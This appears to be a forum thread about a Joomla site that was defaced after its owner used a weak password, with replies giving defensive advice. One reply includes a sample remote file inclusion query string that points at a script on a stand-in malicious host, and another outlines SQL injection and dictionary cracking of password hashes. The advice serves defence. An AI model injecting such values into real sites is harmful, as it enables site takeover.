Today like mostly every single day I was going to log into my website jorgelinares.com through the Joomla administration page and something weird happened Foot in mouth Wrong password, Username and password do not match, I tried all possible password thinking I may have forgot but suddenly I thought, let me check the main home page. Even though the website was there but my portfolio images were replaced with some wacked graphic images saying " this site is hacked by buIL " I had to admit it was mostly my fault for having such an easy password which was the word admin but I guess I never though I would ever be a hacker's target but it did happened today this morning. Anyways, my site has been completely restored to a new fresh backup which I made a few weeks ago - free of hacking and of course changed my password to a more secure one. Has this happened to any of you? If so please share your thoughts, how difficult was to get back on track, and the consequences it may have caused you.
Lesson learnt About a year back 1 of my site was hacked by turkish hackers they din't harm my site but just tried to tell me that my password was easy to be hacked all they did was changed the index page
It was hacked today again (lol), the funny thing is I don't see a reason since whoever hacked it twice already is just change the index page and removing all articles. Hopefully I have a backup file and it was restored successfully. Any recomendations to avoid this problem from happening again?
Well someone hacked my sisters facebook, if that has anything to do with this story , her password was: 123456 her new one is 12345678 lol btw could the hacker of help a bug in your webserver, dont they usually leave a backup in an anonymous folder, hey jorge why dont you put some adsense banners between your banner list ?
There are always logs that you can setup. tell your web host that your website has been hacked on various occasions and that you would like them to monior and log all interaction with your website. No matter if it is someone viewing it or a login attempted. It needs to be logged!, so that you may have a chance of tracing this person down. But.. If a hacker ios smart. :Like myself, i woudl hide behind various Firewalls. Proxies and Re-Route through many countries. Mike
You mentioned you are using Joomla. Due to its extensive spread Joomla is a target for all sh*tty crackers around the globe. This doesn't usualy happen because Joomla core is poorly written, but rather because of third party components that are not so secure. Usually they break in by SQL injection and they get the password hash from the database. The hash is MD5 and it cannot be broken (presumably) but they use dictionaries of hashes of common passwords thus being able to decode some of them. Bottom line is: pay attention to what components you install. If you post the list of components installed, I can try to give you a hint about which one is responsible...
If I'm looking at the correct site, you appear to have a lot of URLs that look like this: ...index.php?option=com_contact&view=contact&id=1&Itemid=53 ...?p=7 In every case where the incoming query string contains data, you should determine what will happen if somebody sends a query string that contains the URL of a malicious script on another website instead of the data you were expecting. For example, what will your script do if the query string is: ?p=hxxp://somebadsite.bad/hackscript.php This is called remote file inclusion. In many cases, the victim site (such as yours) will happily fetch that script and run it, which will hack your site. Code all PHP so that if malicious URLs are embedded in the query strings, your script does something harmless, or does nothing at all. You can also set allow_url_fopen to Off in php.ini so that your PHP interpreter is not allowed to fetch files from remote sites. You can also set register_globals to Off.